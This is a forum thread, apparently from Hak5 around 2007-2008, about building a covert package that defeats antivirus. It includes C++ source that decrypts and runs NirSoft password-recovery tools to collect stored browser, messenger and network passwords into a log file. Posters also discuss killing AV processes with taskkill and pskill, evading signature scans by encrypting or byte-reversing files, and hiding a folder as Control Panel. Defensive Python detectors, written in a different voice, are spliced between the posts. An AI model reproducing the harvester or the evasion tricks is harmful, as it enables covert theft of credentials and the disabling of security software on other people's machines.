mleo2003 Posted December 20, 2007

Some AV products have random names for their scanning, so looking for process names may not help in some situations.
sc0rpi0 (thread author) Posted December 20, 2007

> Some AV products have random names for their scanning, so looking for process names may not help in some situations.

This method has been tested with McAfee and it works. Exactly which anti-virus products are you referring to?
mleo2003 Posted December 20, 2007

TrendMicro Enterprise Solution (old job used it)
hexlax Posted December 21, 2007

> Some AV products have random names for their scanning, so looking for process names may not help in some situations.

True; however, it may be as simple as searching for default installation directories such as "C:\Program Files" or even the registry.

Side bar: Has anyone tried to end AV processes by using taskkill /t (which kills child processes as well)? Currently not running any AV on my VM for packing reasons for this app...
sc0rpi0 (thread author) Posted December 21, 2007

> Some AV products have random names for their scanning, so looking for process names may not help in some situations.
>
> True; however, it may be as simple as searching for default installation directories such as "C:\Program Files" or even the registry.
>
> Side bar: Has anyone tried to end AV processes by using taskkill /t (which kills child processes as well)? Currently not running any AV on my VM for packing reasons for this app...

Yes, that is a good idea. Unfortunately, I wouldn't be the one to ask. Although "taskkill /t" may work, I would recommend using pskill from Sysinternals. I wonder... would this killing of child processes do the trick? [thinking out loud] Not only can it kill child processes, but system processes as well.
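The taskkill /t and pskill discussion above has a defender-side counterpart: process-termination commands aimed at the AV's own processes are easy to spot in process-creation telemetry. The following is an added example (mine, not code from anyone in the thread) that parses constructed log records, picks out taskkill/pskill invocations, and reports those aimed at a listed AV process or using a tree kill. The AV process names and the pipe-separated record format are constructed placeholders.

```python
# Constructed placeholder names; fill these in from the AV product actually deployed.
AV_PROCESSES = {"avscanner.exe", "avservice.exe"}

# Constructed sample process-creation records: time|parent image|image|command line
SAMPLE_LOG = """\
2007-12-21T10:01:02|explorer.exe|cmd.exe|cmd /c taskkill /f /t /im avscanner.exe
2007-12-21T10:01:05|cmd.exe|pskill.exe|pskill -t avservice.exe
2007-12-21T10:02:11|explorer.exe|cmd.exe|cmd /c taskkill /im notepad.exe
2007-12-21T10:03:00|svchost.exe|taskkill.exe|taskkill /pid 4120 /t
2007-12-21T10:04:30|explorer.exe|notepad.exe|notepad.exe readme.txt
"""

def _basename(token: str) -> str:
    return token.strip('"').replace("/", "\\").rsplit("\\", 1)[-1].lower()

def parse_kill_command(cmdline: str):
    """Return (tool, target, tree_kill) for a taskkill/pskill command line, else None.
    tree_kill is True for taskkill /t or pskill -t, which take child processes down too."""
    tokens = [t.strip('"') for t in cmdline.split()]
    for i, tok in enumerate(tokens):
        args = [a.lower() for a in tokens[i + 1:]]
        if _basename(tok) in ("taskkill", "taskkill.exe"):
            target = next((args[j + 1] for j, a in enumerate(args)
                           if a in ("/im", "/pid") and j + 1 < len(args)), "")
            return "taskkill", target, "/t" in args
        if _basename(tok) in ("pskill", "pskill.exe"):
            positional, skip = [], False   # drop switches, \\computer and -u/-p values
            for a in args:
                if skip or a.startswith(("-", "\\\\")):
                    skip = a in ("-u", "-p")
                    continue
                positional.append(a)
            return "pskill", positional[0] if positional else "", "-t" in args
    return None

def find_av_kill_attempts(log_text: str, av_processes=AV_PROCESSES):
    """Return (time, tool, target, tree_kill, hits_av) tuples worth an alert: a kill aimed
    at an AV process, or any tree kill (randomly named scanners will not match a list)."""
    av = {p.lower() for p in av_processes}
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        time, _parent, _image, cmdline = line.split("|", 3)
        parsed = parse_kill_command(cmdline)
        if parsed is None:
            continue
        tool, target, tree = parsed
        hits = target in av or target + ".exe" in av
        if hits or tree:
            findings.append((time, tool, target, tree, hits))
    return findings
```

Tree kills are reported even when the target is not on the list, which is the only way to catch the randomly named scanner processes mleo2003 mentions.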
hexlax Posted December 21, 2007

Here is the source using a small payload from the great folks at Nirsoft. Still a lot of work to do to finish the final program, but I'll have more time over the holidays with no work or classes to hack up some code. I may start a new thread for my own payload since this is becoming a beast of its own.

This code assumes you have ccrypt in the current executing directory. Although the encrypted files should scan clean for signature-based AVs (please provide feedback), once they are run, AVs will catch the process. Also, you should manually encrypt the payload files first before running this code.

```cpp
/*
 * AUTHOR: hexlax
 *
 * The encryption handling of this program is done. Please
 * give me feedback if any AVs catch it.
 *
 * Command line options for final product (not implemented now):
 * a) -q quiet mode, nothing displays to screen
 * b) -f force run anyways
 *      i) if local admin privs not present
 *     ii) if AV is detected and forced stop failed
 *    iii) Places payload in danger of AV removal
 * c) -c config file path [optional - default presumed]
 *      i) payload list
 *     ii) utilities list (ccrypt, pskill, etc.)
 * d) -k only attempt to kill AV, no payload run
 *
 * The final product should be scalable enough for a user
 * to add/delete/modify the payload by editing the config file.
 */
#include "stdafx.h"
#include <iostream>
#include <string>
#include <stdlib.h>
using namespace std;

// global constants
// directory holding the payload tools; trailing separator so the paths below concatenate
const string PAYLOAD_FILEPATH = "tools\\";  // TODO: insert user pref from config file.
const string ENC_KEY = "hexlax@hak5";       // TODO: insert user pref from config file.

void decrypt() {
    cout << "Decrypting payload...\n";
    string syscall = "ccrypt -d -K " + ENC_KEY + " -r " + PAYLOAD_FILEPATH;
    system(syscall.c_str());
}

void encrypt() {
    cout << "Encrypting payload back...\n";
    string syscall = "ccrypt -e -K " + ENC_KEY + " -q -r " + PAYLOAD_FILEPATH;
    system(syscall.c_str());
}

void run_payload() {
    string syscall;
    cout << "Running Payload:";
    // IEPV.EXE
    cout << ".IEPV..";
    syscall = PAYLOAD_FILEPATH + "iepv /stext iepv.tmp";
    system(syscall.c_str());
    // MSPASS.EXE
    cout << ".MSPASS...";
    syscall = PAYLOAD_FILEPATH + "mspass /stext mspass.tmp";
    system(syscall.c_str());
    // NETPASS.EXE
    cout << ".NETPASS..";
    syscall = PAYLOAD_FILEPATH + "netpass /stext netpass.tmp";
    system(syscall.c_str());
    // PSPV.EXE
    cout << ".PSPV..";
    syscall = PAYLOAD_FILEPATH + "pspv /stext pspv.tmp";
    system(syscall.c_str());
    // END PAYLOAD
    cout << "\n";
}

void cleanup_temps() {
    string syscall = "";
    cout << "Cleaning up...\n";
    // consolidate our tmp files into one
    // TODO: implement the user's preference here for a
    // file name & program list from config file
    // TODO: after list file is done, use a for statement for cleaner code
    cout << "Saving output to log.txt...\n";
    syscall = "type iepv.tmp >> log.txt";
    system(syscall.c_str());
    syscall = "type mspass.tmp >> log.txt";
    system(syscall.c_str());
    syscall = "type netpass.tmp >> log.txt";
    system(syscall.c_str());
    syscall = "type pspv.tmp >> log.txt";
    system(syscall.c_str());
    // get rid of *.tmp files
    cout << "Removing temp files...\n";
    syscall = "del *.tmp";
    system(syscall.c_str());
}

int main() {
    decrypt();
    run_payload();
    encrypt();
    cleanup_temps();
    cout << "Scan Complete!\n";
    return 0;
}
```
trustme Posted December 22, 2007

Package, not payload. People really need to learn the difference.
hexlax Posted December 24, 2007

Hey, I started a new thread for my package implementing the encryption. Right now I'm working on the AVkill side of the program. Please help me out there, Scorpio, with that AV list you're compiling... http://forums.hak5.org/index.php/topic,8169.0.html
Zero_Himself Posted December 2, 2008

Well, let's think outside of the box for a minute ;-) beforehand.... *payload* = "Our program that we are trying to sneak past the AV"

If I were trying to do this back in the day (MS-DOS 5-6.22), I would encrypt the file in a .exe loader (that I would write myself), and then decrypt the *payload* in memory, and reload the decrypted *payload* over top of some null-padded chunk of my loader's memory (maybe just over top of the original .exe's memory), and restart it.....

So, maybe a loader could be written that:
A. uses the same libs and DLLs (so they are already loaded)
B. decrypts its payload, and overwrites itself (WITHOUT GETTING SWAPPED OR WRITTEN TO DISK!!!!)
C. restarts its own execution......

Maybe this would get past the anti-virus. I don't have the time, or I would look into the idea, but I suspect that if you search MSDN, we can probably find the format of a .EXE file, and how the libs (.dll's) are loaded...., and once you do that, you can load the needed libs, and by-pass the whole writing to disk (I AM ASSUMING THAT THAT IS WHERE AN AV PICKS IT UP AT.....), and by-pass detection.

I use McAfee, and I am trying to whip up a little POC program to see if McAfee will catch the decrypted *payload* in memory or not... I'll keep ya filled in
Zero_Himself Posted December 2, 2008

Funny thing here..... By simply reversing the entire file (first byte becomes last byte, second byte becomes next-to-last byte, etc.), my file goes totally undetected.... (DIDN'T EVEN HAVE TO CRYPT IT!!!!, just flip the script ;-) )

Yep, just like I thought.... McAfee only catches it upon a disk write (I still haven't tried to execute anything from memory, but I suspect that we would kind of need to by-pass Windows for that kind of functionality), so in theory we could custom load our decrypted *payload* and run it without the AV noticing it... (this would maybe even eliminate the need for an AVkill..) but then again, this would be a real temporary thing...

I'm willing to bet tools like this are written every day, and added to AV signature files every day... but remember this: if you write a nifty tool that successfully does this, everyone will want to use it, then it becomes mainstream, and then AVs will notice it, and it will get blocked by AV software ;-)
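hexlax's package keeps its tools ccrypt-encrypted on disk, and the post above gets a similar result by storing the file back to front; both keep a signature scanner from recognising a stored executable until it is restored. The following added example (mine, not code from the thread) is the normalisation a scanner or triage script can apply: it classifies a blob as a plain PE, a byte-reversed PE, or a high-entropy blob of the kind an encrypted or packed tool leaves behind. The PE-shaped sample it builds is constructed and is not a runnable executable.

```python
import math
import struct
from collections import Counter

def _is_pe(data: bytes) -> bool:
    """True when data has a DOS 'MZ' stub whose e_lfanew points at a 'PE\\0\\0' signature."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return e_lfanew + 4 <= len(data) and data[e_lfanew:e_lfanew + 4] == b"PE\0\0"

def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for empty input, 8.0 for uniformly distributed bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())

def classify_blob(data: bytes, entropy_threshold: float = 7.5) -> str:
    """'pe', 'reversed-pe', 'high-entropy' (encrypted/packed, like the ccrypt'd tools) or 'unknown'."""
    if _is_pe(data):
        return "pe"
    if _is_pe(data[::-1]):          # stored back to front, as in the post above
        return "reversed-pe"
    if len(data) >= 256 and shannon_entropy(data) >= entropy_threshold:
        return "high-entropy"
    return "unknown"

def build_sample_pe(stub_text: bytes = b"This program cannot be run in DOS mode.") -> bytes:
    """Constructed minimal PE-shaped blob for testing (not a real executable)."""
    header = bytearray(0x40)
    header[:2] = b"MZ"
    struct.pack_into("<I", header, 0x3C, 0x40 + len(stub_text))   # e_lfanew
    return bytes(header) + stub_text + b"PE\0\0" + b"\0" * 20
```

Reversing a file is not a transform a scanner will undo on its own, so the point of the check is to normalise the bytes before hashing or signature matching rather than after.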
Infinity0 Posted December 5, 2008

Oh, I know a way. There is a way to rename a folder using the entire path; it then appears to be a Control Panel. Of course this only works on XP. I feel I should admit that I didn't make this; I found it.

```bat
@echo off
if exist con.{21EC2020-3AEA-1069-A2DD-08002B30309D}\nul goto toggleoff
if exist Hide\nul goto toggleon
goto end
:toggleoff
move "\\.\%cd%\con.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Hide>nul
goto end
:toggleon
move Hide "\\.\%cd%\con.{21EC2020-3AEA-1069-A2DD-08002B30309D}">nul
:end
```
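The batch file above combines two tricks: a ".{CLSID}" suffix that makes Explorer show the directory as a shell object (the post says this one renders as Control Panel), and a reserved device name ("con") as the stem, which is why the script must reach the folder through the \\.\ device-path prefix. This added example (mine, not from the post) flags both in a directory listing so a responder can find such folders without relying on Explorer; the listing is constructed.

```python
import re

# Windows reserved device names. "con.<anything>" cannot be created or opened through
# an ordinary path, which is why the batch file above uses the \\.\ device-path prefix.
RESERVED_DEVICES = ({"con", "prn", "aux", "nul"}
                    | {f"com{i}" for i in range(1, 10)}
                    | {f"lpt{i}" for i in range(1, 10)})

# A ".{CLSID}" suffix makes Explorer treat the directory as a shell namespace object
# instead of listing its contents.
CLSID_SUFFIX = re.compile(r"\.\{([0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12})\}$", re.I)

def inspect_name(name: str) -> dict:
    """Describe why a directory entry name is suspicious; empty dict if it is ordinary."""
    info = {}
    m = CLSID_SUFFIX.search(name)
    if m:
        info["clsid"] = m.group(1).upper()
    stem = name.split(".", 1)[0].lower()
    if stem in RESERVED_DEVICES:
        info["reserved_device"] = stem.upper()
    return info

def find_disguised_entries(names):
    """Map each suspicious name in a directory listing to its findings."""
    return {n: inspect_name(n) for n in names if inspect_name(n)}

# Constructed directory listing; the first name is the one from the batch file.
SAMPLE_LISTING = ["con.{21EC2020-3AEA-1069-A2DD-08002B30309D}", "Hide",
                  "Photos.{21EC2020-3AEA-1069-A2DD-08002B30309D}", "report.txt", "nul.txt"]
```

Run it over `os.listdir()` output on the host being examined; a plain directory API lists these names even though Explorer does not show them as folders.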